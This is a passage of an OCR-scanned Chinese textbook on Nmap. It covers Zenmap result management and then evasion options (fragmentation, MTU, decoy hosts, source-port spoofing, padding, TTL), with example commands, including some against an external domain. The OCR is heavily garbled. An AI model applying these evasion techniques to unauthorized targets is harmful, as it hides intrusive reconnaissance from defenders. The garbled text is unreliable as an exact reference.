1 8.27 ms bogon (10.16.39.8 lh tears 
Regular scan 
NSE: Script Post-scanning. 
Initiating NSE at 12:00 Slow comprehensive scan 
Completed NSE at 12:00, 0.005 crspseu 
Initiating NSE at 12 
Completed NSE at 12:00, 0.005 elapsed 
Post-scan script results: 
| clock-skew: 
|. -21s: Majority of systems scanned 
Read data files from: C:\Program Files (x86)\Neap 
OS and Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ . 
Nmap i address (1 host up) scanned in 104.43 seconds 


Raw packets sent: 2032 (91.246KB) | Rcvd: 18 (1.114KB) 








图 5-22 “配置 ”下 拉 列 表 框 中 的 内 容 
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然后 单 击 菜单 栏 上 的 “配置 ”菜单 ， 单 击 “ 编 辑 选中 配置 ”命令 ， 如 图 5-23 所 示 。 





















站 新 的 配置 或 命令 已) ecu :Intense scan plus UDP 
LLLI Si 










































[mmo mem) (nee anen || eme [iom 
BER C A nmap -T4 A v 10.16398 s]: ma 

















| message sipuing: dissbied (wiron but defadit) 
|_smbv2-enabled: Server supports SMBv2 protocol 





TRACEROUTE 
HOP RIT ADDRESS 
17 Gui es bozon (10.16.39.8) 





Completed NSE at 12:00, 0.005 elapsed 
Post-scan scriot results: 

| clock-skew: 

|. 215: Majority of systems scanned 

Read di gram Files (x86) Wmap 

OS and Service detection performed. Please report amy incorrect results at 
https://nmap.org/submit/ . [3 
Nmap done: 1 I? address (1 host up) scanned in 104.43 seconds d 
Raw packets sent: 2032 (91.246KB) | Rcvc: 18 (1.114KB) 



































图 5-23 单 击 “ 编 辑 选中 配置 ”命令 
之 后 可 以 和 刚才 添加 新 的 配置 和 命令 一 样 修改 相关 内 容 ， 如 图 5-24 所 示 。 







[em ss | Ping [e| eis [in| e| e| 
Ema 





||| BEBE Intense scan plus UDP 


æð Does OS detection (-O), version detection (-sV), script 
scanning (-sC), and traceroute (--traceroute) in addition to 
scanning TCP and UDP ports. 


























ies ee Ee | 


5-24 ”编辑 Zenmap 中 的 配置 


5.6 X} Zenmap 扫描 的 结果 进行 管理 和 比较 
Zenmap 会 将 扫描 的 结果 存放 到 一 个 检索 数据 库 中 ， 当 然 也 可 以 将 其 保存 为 一 个 .XML 
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文件 。 如 果 和 希望 找到 近期 的 某 一 个 扫描 结果 ， 就 可 以 单 击 菜单 栏 上 的 “工具 ”菜单 ， 然 后 单 
击 其 中 的 “搜索 扫描 结果 ”命令 ,如 图 5-25 所 示 。 














BEBE Intense scan plus UDP 





























sscysen | see | anses] 
nmap -T4 -A -v 10.16.39.8 
































— 
gning: disabled (dangerous, but default) 
|-smbv2-enabled: Server supports SMBv2 protocol 


TRACEROUTE 
HOP RIT ADDRESS 
1 0.27 ms bogon (10.16.39.8) 


NSE: Script Post-scanning. 
Initiating NSE at 12: 

leted NSE at 12:00, 0.005 elapsed 
Initiating NSE at 12 
Completed NSE at 12:00, 0.005 elapsed 
Post-scan script results: 


OS and Service detection performed. Pleare report any incorrect rezultr at 
nttps://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 134.43 seconds 

Raw packets sent: 2032 (91.246KB) | Revd: 18 (1.114KB) 





























图 5-25 Zenmap 中 的 “搜索 扫描 结果 ”功能 


这 时 会 打开 一 个 搜索 选项 对 话 框 ， 可 以 在 搜索 后 面 的 文本 框 中 添加 各 种 标准 ， 如 图 5-26 
所 示 。 





nmap -O -F --fuzzy --osscan-guess 192.168.153.130 
nmap -O -F --fuzzy --osscan-guess --packet-trace 192.168.153.130 
nmap -O -F --fuzzy --osscan-guess --packet-trace 192.168.153.130 
nmap -O -F --fuzzy --osscan-guess 192.168.153.130 
nmap -O -F --fuzzy --osscan-guess www.tstc.edu.cn 










nmap -O -F --fuzzy --osscan-guess wwwtstc.edu.cn 

nmap -p 80 --script http-methods www.tstc.edu.cn 

nmap -p 80 --script http-methods --script-args http-methods.retest www.tstc.edu.cn 

nmap -p 80 --script http-methods --script-args http-methods.url path=/mypath/ www.tstc.edu.cn 
* = m = E LI 
[cose j| dmm )[ open 


图 5-26 Zenmap 中 的 “搜索 扫描 ”对 话 框 
可 以 单 击 右 侧 的 “表达 式 ” 按 钮 来 选择 各 种 各 样 的 标准 ， 如 图 5-27 所 示 。 
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sscan-guess 192.168.153.130 

sscan-guess --packet-trace 192.168.153.130 
Sscan-guess --packet-trace 192.168.153.130 
sscan-guess 192.168.153.130 

sscan-guess wwwtstc.edu.cn 

Sscan-guess www.tstc.edu.cn 

p-methods www.tstc.edu.cn. 

nmap -p 80 --script http-methods --script-args http-methods.retest www.tstc.edu.cn 





Matched 114 out of 114 scans. 
— 


图 5-27 “表达 式 ” 选 项 
例如 ， 如 果 端 口 80 是 开放 的 ， 可 以 如 图 5-28 所 示 进 行 选择 。 























nmap -O -F --fuzzy --osscan-guess 192.168.153.130 
nmap -O -F --fuzzy --osscan-guess --packet-trace 192.168.153.130 
nmap -O -F --fuzzy --osscan-guess --packet-trace 192.168.153.130 
nmap -O -F --fuzzy --osscan-guess 192.168.153.130 
| nmap -O -F --fuzzy --osscan-guess wwwitstc.edu.cn 











| nmap -O -F --fuzzy --osscan-guess wwwtstceduen 
| nmap -p 80 --script http-methods www.tstc.edu.cn 

| nmap -p 80 --script http-methods --script-args http-methods.retest www.tstc.edu.cn 

nmap -p 80 --script http-methods --script-args http-methods.url path=/mypath/ www.tstc.edu.cn 
nmap -p 80 --script http-methods --script-args http-methods.urlpathz/mypath/ wwwistceducn ~ | 


m , | 


- 





































Matched 87 out of 114 scans. | gose "HIE: Rim || open 




































图 5-28 ”搜索 端口 80 状态 为 “open” 的 扫描 结果 


这 里 一 个 十 分 常用 的 功能 就 是 ， 可 能 要 经 常 对 某 一 目标 进行 相同 扫描 ， 以 观察 这 个 目标 
是 否 发 生 了 变化 。 例 如 ， 当 给 一 个 系统 安装 了 补丁 或 者 更 新 ， 又 或 者 更 改 了 网 络 中 防火 墙 和 
路 由 器 的 访问 控制 列表 ， 这 时 需要 对 修改 之 前 和 之 后 进行 比较 。 最 有 效 的 做 法 就 是 直接 比较 
两 次 扫描 的 结果 。 

例如 首先 对 192.168.153.131 主机 进行 扫描 ， 可 以 得 到 如 图 5-29 所 示 的 扫描 结果 。 

然后 将 这 次 扫描 结果 以 20161118d11h18m.xml 为 名 保存 起 来 ， 如 图 5-30 所 示 。 
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4 Zenmap I eg X 


扫描 (8) IRAD 配置) FDH 


Bt [192168153131 器 s [z] s) (s 
命令 :| nmap 192.168.153.131 


ETE 


所 作 系统 主机 nmap 192.168.153.131 El 


25/tcp open smtp ^ 
B bogonüS2 |n 
53/tcp. 



























































MAC Address: 00:0C:29:90:DF:C3 (VMware) 
umm '  |Nmap done: 1 IP address (1 host up) scanned in 2.41 seconds 






































= 


图 5-29 对 192.168.153.131 主机 进行 扫描 的 结果 























2016/5/11 星期 三 
2016/10/9 星期 日 
2016/10/13 
2016/10/10 星 鸯 一 
2016/10/9 星期 日 
Yesterday at 15:50 





gv- 

-& DVD RW SED (F) 2016/6/3 RWE 
-uft i 2016/4/25 星 划一 
2016/10/13 星期 四 
2016/11/11 星期 五 
2016/4/25 用 网 一 
2016/11/10 
2016/10/9 星期 日 





IEEE: [Nmap XMUES (om) [| 


emen Cse] 

















图 5-30 以 20161118d11h18m.xml 为 名 保存 的 扫描 结果 


然后 对 192.168.153.131 主机 进行 一 点 修改 ， 比 如 说 关闭 它 的 HTTP 服务， 开启 FTP 服 
Z., 然后 在 对 其 进行 扫描 ， 并 保存 ， 如 图 5-31 所 示 。 
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pm 





places [Name i Modified E 
1S Search B licenses 2016/10/8 星期六 
© Recently Used |£5 ndiff 2016/8/29 星期 一 
(B Administrator 目 NsE 2016/11/4 BIET 
|B Desktop. £5 nselib. 2016/11/4 星期 五 
[a BRE (C) |D py2exe 2016/10/8 星期 六 
(Esse (0) |E scripts 本 


| 本 地 开盘 (E) (D share 2016/10/8 B 
| DVD RW BED (F) 3rd-party-licenses.txt 69.5 KB 2016/9/28 星期 三 
[o HF m » ca-bundle.crt 2524KB 2016/9/29 星期 四 
677.3KB 2016/9/29 星期四 
267KB 2016/9/28 R= 
259KB 2016/9/29 RITI 
147KB 2016/9/28 星 其 三 
0 bytes 2016/11/4 RWT 


WERE Nmap XMUES (xml) |v 


Eee [se 




















图 5-31 对 目标 主机 进行 修改 以 后 的 扫描 结果 进行 保存 


在 Zenmap 中 ， 单 击 菜单 栏 上 的 “工具 ”菜单 ， 然 后 单 击 “ 结 果 比 对 ”命令 ， 如 图 5-32 
所 示 。 






























































bled (dangerous, but default) 
Server supports SMBv2 protocol 


0.27 ms bogon (19.16.39.8) 


NSE: Script Post-scanning. 
Initiating NSE at 12:00 


Completed NSE at 12:80, 0.005 elapsed 
Post-scan script results: 
| clock-skes: 


|. -21s: Majority of systems scanned 
Read data files from: C:\Program Files (x86) Wrap 
OS and Service detection performed. Please report any incorrect results at 
https://nmao.org/submit/ . fl 
Nmap done: 1 IP address (1 host up) scanned in 104.43 seconds 

Raw packets sent: 2032 (91.246KB) | Rcvd: 18 (1.114KB) 




















图 5-32 Zenmap 中 的 结果 比 对 功能 
在 “扫描 A” 和 “扫描 B” 中 选择 两 次 不 同 的 扫描 结果 ， 如 图 5-33 所 示 。 
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图 5-33 Zenmap 中 的 结果 比 对 窗口 


如 果 在 下 拉 列 表 中 未 找到 扫描 结果 ， 可 以 单 击 右 侧 的 “Open ”按钮 来 寻找 扫描 结果 。 进 
行 比较 之 后 ，Zenmap 中 会 显示 出 两 次 结果 的 不 同 。 图 5-34 给 出 两 次 扫描 比 对 的 结果 。 











21061118d11h37mxml 四 [aren] 20161118d11h18mxml 7 [eeen] 





-Nmap 7.30 scan initiated Fri Nov 18 11:37:09 2016 as: nmap 192.168.153.131 
*Nmap 7.30 scan initiated Fri Nov 18 11:30:12 2016 as: nmap 192.168.153.131 


bogon (192.168.153.131, 00:0C:29:90:DF:C3) : 
|| Host is up. 


^ot shown: 982 closed ports 
PORT STATE SERVICE VERSION 
open ssh 
open smtp 
Open nameserver 
open 
open 
open 
open 
open netbios-ssn 
open https 
open microsoft-ds 


S63/tcp open snews 
1025/tcp open NFS-or-IIS 
|| 1026/tcp open LSA-or-nterm 
|| 1029/tcp open ms-1sa 
1030/tcp open iadi 
1031/tcp open iad2 




















图 5-34 ”两 次 扫描 的 不 同 之 处 
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这 个 结果 显示 出 两 次 扫描 的 不 同 之 处 ， 分 别 使 用 红色 和 绿色 表示 。 


5.7 Zenmap 中 的 拓扑 功能 


在 扫描 过 程 中 ， 如 果 启 用 traceroute 命令 ， 在 “拓扑 ”选项 卡 中 将 显示 Nmap 所 在 主机 与 
目标 主机 之 间 的 路 由 信息 ， 例 如 ， 图 5-35 给 出 了 Nmap 所 在 主机 与 百度 服务 器 之 间 的 路 由 。 


























lr] iml ne 























tower rig oap [ B 











D2 | fueyeoning | B titoren factor [B ond spread factor m. 





图 5-35 Nmap 所 在 主机 与 百度 服务 器 之 间 的 路 由 信息 


如 果 希 望 保存 这 次 的 路 由 信息 ， 可 以 单 击 “ 拓 扑 ” 选 项 卡 右上 角 的 “保存 图 表 ” 按 钮 ， 
如 图 5-36 所 示 。 


E] EE intense scan 














xs ansa|as 


EE 






































5-36 ”保存 路 由 信息 
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然后 选择 保存 的 位 置 ， 如 图 5-37 所 示 。 














Name: 


ee m—À 


Places ^| Name ^ Size ^ Modified 
^, Search 司 B licenses 2016/10/8 BEA — 
© Recently Used B ndi 2016/8/29 YI 
P Administrator 7 ||E2 NSE 2016/11/4 星期五 
+- B nselib 2016/11/4 EE ~ 


远近 文本 类 型 ， | 所 定义 扩展 名 [|] 


[Eene] [aseve] 

















图 5-37 选择 保存 的 位 置 
例如 ， 将 这 个 文件 命名 为 lpng， 然 后 保存 到 C 盘 下 的 test 文件 夹 中 ， 如 图 5-38 所 示 。 


一 
Lor 计算 机 » PERS (C) ， test 























图 5-38 保存 路 由 信息 


小 结 


在 这 一 章 中 ， 系 统 学 习 了 如 何 使 用 图 形 化 软件 Zenmap 操作 Nmap， 包 括 启 动 Zenmap 
的 方式 、 管 理 Zenmap 扫描 、 在 Zenmap 中 执行 扫描 命令 的 方式 、 如 何 管理 Zenmap 的 配置 、 
如 何 管理 Zenmap 的 结果 等 。 对 于 很 多 习惯 于 图 形 化 操作 的 人 们 来 说 ，Zenmap 无 疑 是 一 个 
好 消息 。 我 个 人 觉得 图 形 化 的 最 大 优势 在 于 结果 的 直观 性 ， 因 此 本 书 中 的 很 多 实例 都 是 在 
Zenmap 中 实现 的 ， 这 并 不 意味 着 我 在 向 你 传达 Zenmap 要 比 Nmap 更 好 的 观点 。 之 所 以 这 样 
做 ， 是 因为 Zenmap 的 结果 更 适合 在 书本 中 展示 。 需 要 大 家 注意 的 是 ，Zenmap 在 Windows 
下 的 运行 稳定 性 并 不 好 ， 经 常会 出 现 假死 的 情况 。 因 此 在 实际 应 用 中 ， 建 议 大 家 直接 使 用 
Nmap。 























CHAPTER 


06 、。 


Nmap 的 高 级 技术 与 防御 措施 


本 章 将 会 讲解 Nmap 的 一 些 高 级 技术 ， 包 括 如 下 。 

口 如 何 对 自身 进行 伪装 ， 一 些 用 来 逃 过 网 络 安全 机 制 的 方法 。 
口 如 何 使 用 Wireshark 检测 网 络 中 的 Nmap 扫描 。 

口 如 何 躲避 来 自 Nmap 的 主机 操作 系统 扫描 。 

口 如 何 保存 扫描 结果 。 


6.1 Nmap 的 伪装 技术 


很 多 人 都 认为 Nmap 中 不 应 该 提供 逃避 防火 墙 规则 或 欺骗 IDS 的 功能 ， 因 为 这 些 功 能 可 
能 会 被 攻击 者 所 滥用 。 但 是 很 多 安全 工具 已 经 提供 了 这 些 功 能 ， 因 此 Nmap 中 包含 这 些 功能 
可 以 帮助 网 络 管理 员 增 强 安全 性 。 

Nmap 不 提供 检测 和 破坏 防火 墙 及 IDS 系统 的 专门 工具 和 选项 ， 但 是 却 提供 了 相关 的 技 
术 。 如 果 你 在 这 方面 有 足够 的 经 验 ， 那 么 别 的 工具 能 完成 的 ，Nmap 也 一 样 可 以 做 到 。 

下 面 介 绍 Nmap 中 提供 的 用 来 完成 这 些 任务 的 相关 选项 ， 首 先 来 看 -f ( 报 文 分 段 ) 
技术 。 

1. Nmap -目标 

使 用 -f 选 项 可 以 对 Nmap 发送 的 探测 数据 包 进行 分 段 。 这 样 将 原来 的 数据 包 分 成 几 个 部 
分 ,目标 网 络 的 防御 机 制 例 如 包 过 滤 、 防 火 墙 等 在 对 这 些 数据 包 进 行 检测 的 时 候 就 会 变 得 更 
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加 困难 。 另 外 必须 谨慎 使 用 这 个 选项 ， 一 些 老 旧 的 系统 在 处 理 分 段 的 包 时 经 常会 出 现 死机 的 
情况 。 

下 面 以 一 个 实例 来 解释 这 个 命令 的 执行 过 程 ， 如 下 所 示 。 

Nmap -f 10.16.39.8 


图 6-1 给 出 了 使 用 分 段 进行 扫描 的 结果 。 


Bii) ERO 
Bx 10.16.39.8 




















$$: nmap -f 10.16.39.8 


(memes omm) | vps [mcum 


揽 作 系统 4 主机 nmap -f 10.16.39.8 iz] ; 


























W 。 bogon (10.1 


Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-07 14:49 ?D1útêx?è 
E 

Warning: Packet fragmentation selected on a host other than Linux, 
OpenBSD, FreeBSD, or NetBSD. This may or may not work. 

Nmap scan report for bogon (10.16.39.8) 

Host is up (0.00s latency). 

All 1000 scanned ports on bogon (10.16.39.8) are filtered 

MAC Address: EC:4D:D4:38:6C:27 (Universal Global Scientific 
Industrial) 


Nmap done: 1 IP address (1 host up) scanned in 23.81 seconds 














图 6-1 使 用 分 段 的 数据 包 对 目标 进行 扫描 


图 6-2 中 是 使 用 Wireshark 抓 包 获得 的 数据 ， 可 以 清楚 地 看 到 大 量 的 数据 包 上 面 都 含有 
Fragmented IP protocol 的 标识 。 这 一 点 说 明 这 些 数 据 包 都 是 分 段 的 报 文 。 


Time Source Destination Protocol Lengtl „lofa 
179.7008910( 192.168.153.128 10.16.39.8 IPv4 42 有 Fragmented 1P protocol 


179.7009470( 192.168.153.128 10.16.39.8 ragmented IP protocol 
179.7009730€ 192.168.153.128 10.16.39.8 ragmented I protocol 
179.7010070€ 192.168.153.128 10.16.39.8 ragmented IP protocol 
179.7010220 192.168.153.128 10.16.39.8 ragmented IP protocol 


179.7011860 192.168.153.128 IPv4 ragmented IP protocol 


i+ Internet Protocol Version 4, Src: 192.168.153.128 (192.168.153.128), Dst: 10.16.39.8 (10.16.39. 


+  Etnernert ii, src: vmware . u: f Ust: VmWare To:ac:ie Sema Qoi] 
| Internet Control Message Protocol 





图 6-2 捕获 扫描 过 程 中 的 数据 包 
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需要 注意 的 是 ， 如 果 Nmap 在 Windows 下 使 用 了 这 个 功能 的 话 ， 会 出 现 如 图 6-3 所 示 的 
一 段 提示 ， 表 示 这 个 功能 在 Windows 下 可 能 无 法 正常 工作 。 

















E 





| nmap -f 10.16.39. z] 


Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-07 15:45 ?D1útêx?ê 
£2 

Warning: Packet fragmentation selected on a host other than Linux, 
OpenBSD, FreeBSD, or NetBSD. This may or may not work. 


图 6-3 Windows 下 使 用 分 段 数据 包 扫描 的 提示 








2. -mtu (使 用 指定 的 MTU ) 

最 大 传输 单元 (Maximum Transmission Unit, MTU) 是 指 一 种 通信 协议 的 某 一 层 上 面 所 
能 通过 的 最 大 数据 包 大 小 (以 字 节 为 单位 )。 一 般 来 说 ， 以 太 网 的 MTU 值 默 认 是 1500 bytes, 
这 个 含义 就 是 指 当 发 送 者 的 协议 高 层 向 IP. 层 发 送 了 长 度 为 2008 bytes 的 数据 报 文 ， 则 该 报 文 
在 添加 20 bytes 的 全 包头 后 IP 包 的 总 长 度 是 2028 bytes， 因 为 2028 大 于 1500， 因 此 该 数据 
报 文 就 会 被 分 片 。 在 Nmap 中 使 用 --mtu 选项 可 以 指定 MTU 的 大 小 ， 这 里 MTU 的 值 必须 是 
8 的 整数 倍 。 指 定 MTU 的 方法 如 下 。 

Nmap --mtu 目标 

图 6-4 给 出 了 使 用 MTU 为 16 的 数据 包 进 行 扫描 的 过 程 。 
sme M 


RED IAD ME) MMH 
Hi (1015398 [z] ex -] (me) sx 



























€: nmap --mtu 16 10.16.39. 


[E m | nmpas [anan] E3ES 3E 
|| exe « 主机 nmap f 10.16.39.8 c 
$ — bogon(101 | Starting Nmap 6.47 ( http://nmap.org ) at 2017-03-07 15:28 csT 
Nmap scan report for 10.16.39.8 
Host is up (0.6016s latency). 
Not shown; 991 filtered ports 
PORT STATE SERVICE 
80/tcp open http 
135/tcp open msrpc 
139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
1034/tcp open zincite-a 
1433/tcp open ms-sql-s 
1434/tcp open ms-sql-m 
2869/tcp open icslap 
6001/tcp open Xll:1 


Naap done; 1 IP address (1 host up) scanned in 23.14 seconds 











图 6-4 使 用 MTU 为 16 的 数据 包 进行 扫描 


同样 使 用 Wireshark 捕获 发 送 的 数据 包 并 查看 详情 ， 捕 获 的 数据 包 中 Data 字段 长 度 为 
16bytes， 如 图 6-5 所 示 。 
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可 以 看 到 每 个 发 送 的 包 的 数据 区 域 大 小 都 被 修改 成 了 16bytes。 


Source Destination Protocol Lengtl Info 


1652 47.24043400( 192.168.153.128 10.16.39.8 


Data (16 bytes) 





图 6-5 使 用 Wireshark 查看 发 送 数据 包 的 数据 部 分 大 小 


3. -D «decoy1[ , decoy2][ , ME] , ..» (使 用 诱饵 主机 隐蔽 扫描 ) 

通常 在 对 目标 进行 扫描 时 ， 有 可 能 会 被 发 现 。 一 个 比较 巧妙 的 方法 就 是 同时 伪造 大 量 的 
主机 地 址 对 目标 进行 扫描 。 这 时 目标 主机 即使 发 现 了 有 人 正在 进行 扫描 ， 但 是 由 于 扫描 数据 
包 来 自 于 多 个 主机 ， 即 使 是 IDS 也 只 能 知道 目前 正在 受到 扫描 ， 并 不 知道 到 底 是 哪 台 主机 在 
进行 扫描 。 这 是 一 种 常用 的 隐藏 自身 IP 的 可 靠 技 术 。Nmap 中 支持 使 用 诱饵 主机 ， 在 扫描 时 ， 
使 用 选项 -D 来 指定 诱饵 主机 ， 使 用 逗号 分 隔 每 个 诱饵 IP 地址， 也 可 用 自己 的 真实 TP 作为 诱 
饵 ， 自 己 的 IP 地 址 可 以 使 用 ME 选项 。 如 果 在 第 6 个 位 置 或 更 后 的 位 置 使 用 ME 选项 ， 一 些 
常用 端口 扫描 检测 器 (如 Solar Designer's excellent scanlogd) 就 不 会 报告 这 个 真实 IP。 如 果 
不 使 用 ME 选项 ，Nmap 将 真实 IP 放 在 一 个 随机 的 位 置 。 

注意 ， 作 为 诱饵 的 主机 必须 处 于 工作 状态 ， 否 则 这 次 扫描 就 变 成 了 SYN 洪水 攻击 。 另 
外 需要 小 心 的 是 ， 如 果 在 网 络 中 只 有 一 台 主 机 A 在 工作 ,那么 无 论 你 产生 了 多 少 个 诱饵 ， 都 
很 明显 就 是 主机 A 在 扫描 。 

在 初始 的 ping 扫描 (ICMP、SYN、ACK 等 ) 阶段 或 真正 的 端口 扫描 ， 以 及 远程 操作 系 
统 检测 (-0) 阶段 都 可 以 使 用 诱饵 主机 选项 。 但 是 在 进行 版 本 检测 或 TCP 连接 扫描 时 ， 诱 饵 
主机 选项 是 无 效 的 。 

使 用 太 多 的 诱饵 意义 并 不 大 ， 反 而 导致 扫描 变 慢 而 且 结果 不 准确 。 图 6-6 中 就 演示 了 产 
生 10 台 诱 饵 主机 的 范例 。 

这 里 同样 使 用 Wireshark 抓 取 发 送出 去 的 数据 包 ， 捕 获 到 的 数据 包 如 图 6-7 所 示 。 

可 以 看 到 Nmap 伪造 了 大 量 的 诱饵 主机 对 目标 进行 扫描 。 
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命令 | nmap -D RND:10 10.16.39.8 














EL mm) | moe [mcm | n | ern | s 


E L we w rn 
TG) IAD RC) SP) 
|| Bt [1016395 -| EE z| ej x 








扣 作 系统 4 主机 | nmap -D RND:10 10.16.39.8 [z] 


" bogon(10.1 |Nmap scan report for bogon (10.16.39.8) 

Host is up (0.030s latency). 

Not shown: 990 filtered ports 

PORT STATE SERVICE 

|80/tcp closed nttp 

|135/tcp open  msrpc 

|139/tcp open  netbios-ssn 

445/tcp open  microsoft-ds 

| 1034/tcp open — zincite-a 

|1095/tcp open — nicelink 

| 1433/tcp open ms-sql-s 

1434/tcp open — ms-sql-m 

2869/tcp open — icslap 

6001/tcp open — Xi1:1 

MAC Ad : EC:4D:D4:38:6C:27 (Universal Global Scientific 
Industrial) 





Nmap done: 1 IP address (1 host up) scanned in 12.53 seconds 














图 6-6 ”使 用 诱饵 对 目标 进行 扫描 


m 














Desinston | Protocol| Lengt info 


io (ping) 


9 4.15978 1.102.23 16.39. (ping) request i 
(ping) request i 
(ping) request i 


request 


(ping) request 
(ping) request 


ninn) nominet i 


rame 8: 42 bytes on wire (336 bits), 42 bytes captured (336 bits) on interface 0 
thernet II, Src: Vmware 18:a0:20 (00:0c:29:18:a0:20), Dst: Vmware f6:ac:le (00:50:56:f6:ac:1 
[internet Protocol Version 4, Src: 145.115.174.180 (145.115.174.180), Dst: 10.16.39.8 (10.16. 
[nternet Control Message Protocol 


图 6-7 使 用 Wireshark 捕获 的 诱饵 数据 包 


4. --source-port «portnumber»; -g <portnumber> ( 源 端口 欺骗 ) 





网 络 安全 控制 中 有 一 种 访问 控制 列表 技术 ， 这 种 技术 主要 是 依靠 IP 地 址 和 端口 来 对 数 
据 包 进 行 限制 ， 例 如 有 时 如 果 需 要 保证 DNS 和 FTP 协议 正常 工作 ， 注 意 到 DNS 响应 来 自 
于 53 端口 ，FTP 连接 来 自 于 20 端口 ， 很 多 新 手 管理 员 会 犯 下 一 个 错误 ， 他 们 经 常会 直接 
人 允许 来 自 于 这 些 端口 的 数据 进入 网 络 。 他 们 认为 这 些 端口 里 不 会 有 值得 注意 的 攻击 和 漏洞 
利用 。 这 样 做 其 实 就 是 在 防护 紧密 的 网 络 边界 上 开 了 一 个 漏洞 。 当 然 不 仅仅 是 新 手 会 犯 这 
种 错误 ， 有 时 一 些 专业 的 产品 也 会 如 此 。 例 如 Windows XP 中 包含 的 IPsec 过 滤器 就 包含 了 
允许 所 有 来 自 88 端口 (Kerberos) 的 TCP 和 UDP 数据 流 的 默认 规则 。 另 外 曾经 十 分 著名 的 
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Zone Alarm 个 人 防火 墙 到 2.1.25 版 本 仍然 允许 源 端 口 为 53 (DNS) 或 67 (DHCP) 的 UDP 
包 进入 。 

Nmap 提供 了 -g 和 --source-port 选项 (它们 是 相同 的 )， 用 于 利用 上 述 弱 点 。 只 需要 有 一 
个 被 目标 检测 机 制 遗忘 的 端口 号 ，Nmap 就 可 以 从 这 个 端口 发 送 数 据 。 大 部 分 TCP 和 UDP 
扫描 都 完全 支持 这 些 选项 。 

图 6-8 中 将 扫描 的 源 端口 指定 为 8888。 


m CHE CU. 


iat) IAD KEG FMH) 
Bt% |10.16.39.8 [=] ERO -] [s 


命令 : nmap -g 8888 [10.16.39.8 


mJ Nmap 输 出 [8C | 拓扑 | anaa | sans 


BEER 主机 nmap -D RND:10 10.16.39.8 


W/ — bogon (10.1 |Nmap scan report for bogon (10.16.39.8) 
Host is up (0.030s latency). 

Not shown: 990 filtered ports 

PORT STATE SERVICE 

B0/tcp closed http 

135/tcp open  msrpc 





















































139/tep open  netbios-ssn 

| 2 open microsort as 

| 1034/tcp open — zincite-a 

| 1095/tcp open — nicelink 

i 1433/tcp open  ms-sql-s 
1434/tcp open ms-sql-m 

| 2869/tcp open icslap 

| 6001/tcp open X11:1 

I MAC Address: EC:4D:D4:38:6C:27 (Universal Global Scientific 
Industrial) 















I mm + |Nmap done: 1 IP address (1 host up) scanned in 12.53 seconds 
图 6-8 在 Zenmap 中 指定 扫描 的 源 端口 


同样 使 用 Wireshark 抓 取 发 送出 去 的 数据 包 ， 抓 取 到 的 数据 包 如 图 6-9 所 示 ， 可 以 通过 
"Source port” 字 段 来 查看 源 端 口 。 














No. | Time Source Destination Protocol Lengtl Info 
37 20.08481200( 192.168.153.128 10.16.39.8 TCP 54 ddi-tcp-1 > http [ACK] Se 
TCP http > ddi-tcp-1 [RST] Sel 


41 20.08533800( 192.168. 


7 E 58 ddi-tcp-1 > ftp [SYN] Seq] 





= Frame 73: S8 bytes on wire (464 bits), 58 bytes captured (464 bits) on interface 0 

* Ethernet II, Src: Vmware 18:20:20 (00:0c:29:18:a0:20), Dst: Vmware f6:ac:le (00:50:56:f6:ac:1e) 
* Internet Protocol Version 4, Src: 192.168.153.128 (192.168.153.128), Dst: 10.16.39.8 (10.16.39. 
e 


Source port: ddi-tcp-l (8888 
T 8 





图 6-9 使 用 Wireshark 捕获 的 源 端口 为 8888 的 数据 包 


90 7» 


这 
5, 


默认 情况 下 ，Nmap 发 送 的 报 文中 只 包含 头 部 ， 内 容 部 分 是 空 的 ， 因 此 TCP 数据 包 的 大 
40 Fi, mi ICMP ECHO 请 求 只 有 28 字 节 。 这 种 内 容 为 空 的 报 文 很 容易 被 目标 网 络 
检测 机 制 所 发 现 ， 因 此 在 试图 通过 这 些 目标 网 络 的 检测 机 制 时 ， 可 以 在 数据 包 上 附加 指定 数 
量 的 随机 字 节 ， 这 个 选项 会 使 得 大 部 分 ping 和 端口 扫描 变 慢 ， 但 是 影响 并 不 大 。 图 6-10 中 


小 只 有 
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里 面 所 有 的 TCP 数据 包 都 从 8888 端口 发 送 。 





--data-length <number> (发 送 报 文 时 附加 随机 数据 ) 


将 “--data-length” 指 定 为 25。 


同 


DET =>。 es 


Aia IAD 配置) MIH) 
| BF: [1016395 k] = | [-] Es 
: |nmap --data-length 25 10.16.39.8] 


Nmaptéitti | SRCI/EU | 拓扑 | ENAA | 扫描 


|| ser « em : [nmap --data-length 25 10.16.39. lz] 


Ld bogon (10.1 | Nmap scan report for bogon (10.16.39.8) 
Host is up (8.00095s latency). 
Not shown: 990 filtered ports 
PORT STATE SERVICE 
BO/tcp open http 
135/tcp open msrpc 
139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
1034/tcp open zincite-a 
1095/tcp open nicelink 
1433/tcp open ms-sql-s 
1434/tcp open ms-sql-m 
2869/tcp open icslap 
I Gool/tcp open X11:1 
MAC Address: EC:4D:D4:38:6C:27 (Universal Global Scientific 
Industrial) 











































































|| «mand | mop done: 1 IP address (1 host up) scanned in 14.45 seconds 




















图 6-10 在 Zenmap 中 指定 数据 包 data 部 分 长 度 为 25 
样 使 用 Wireshark 抓 取 发 送出 去 的 数据 包 ， 如 图 6-11 所 示 。 


Source Destination Protocol | Lengtl | Info 


495 17.53690800 192.168.153.128 MEN a 83 44724 > optima-vnet [SYN] 





+| Checksum: Ox06d3 [validation disabled] 
Options: (4 bytes), Maximum segment size 


Œ Maximum segment size: 1460 by-es 
ELSEQ/ACK analysis] 
Data (25 bytes) 
Data: B93eeec57920902958a2b084645c6008e5eb4f 6477822133. . . 
[Length: 25] 





图 6-11. 使 用 Wireshark 查看 发 送 数据 包 data 部 分 的 长 度 
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6. --ttl «value» (设置 IP time-to-live 域 ) 
Nmap 中 可 以 设置 IPv4 数据 包 的 time-to-live 域 为 指定 的 值 ， 指 定 的 参数 为 -tl。 图 6-12 
中 给 出 了 一 个 指定 了 TTL 值 的 扫描 过 程 。 











目标 : | 10.16.39.8 





4: [nmap —t 25 1016398 


(mes omm) [neris EPE 


| EEG 4 主机 nmap --ttl 25 10.16.39.8 


W — bogon(10 | Nmap scan report for bogon (10.16.39.8) 
Host is up (0.60155 latency). 

Not shown: 990 filtered ports 

PORT STATE SERVICE 

80/tcp open http 

135/tcp open msrpc 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

1034/tcp open zincite-a 

1095/tcp open nicelink 

